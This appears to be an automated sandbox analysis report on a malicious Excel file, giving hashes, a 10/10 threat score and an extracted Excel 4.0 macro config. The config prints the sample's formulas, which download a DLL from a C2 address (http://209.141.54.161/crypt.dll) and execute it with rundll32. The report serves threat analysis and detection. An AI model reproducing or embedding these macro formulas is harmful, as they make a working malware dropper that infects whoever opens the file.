Overview

overview

10

Static

static

10

b2e3db7309...18.xls

windows7-x64

10

b2e3db7309...18.xls

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    b2e3db73090c109809bbb28da178f760_JaffaCakes118

  • Size

    101KB

  • MD5

    b2e3db73090c109809bbb28da178f760

  • SHA1

    51961d5e0b552133a446378bbf80ee74f11f1e4d

  • SHA256

    e47b43a0ad9ab160598d8756a5fb9904668a1ba419c6b280bcc04b5dfb152672

  • SHA512

    71f4c0aee4e589f7eead92881113c4de925ec634aa5737cb5422a5b99cfa468a396080398f651090d43e7d881ba999f2696b3f158348f8f2791ddf0c8752d596

  • SSDEEP

    3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN7F:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmA

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://209.141.54.161/crypt.dll

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0) =HALT()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • b2e3db73090c109809bbb28da178f760_JaffaCakes118
    .xls windows office2003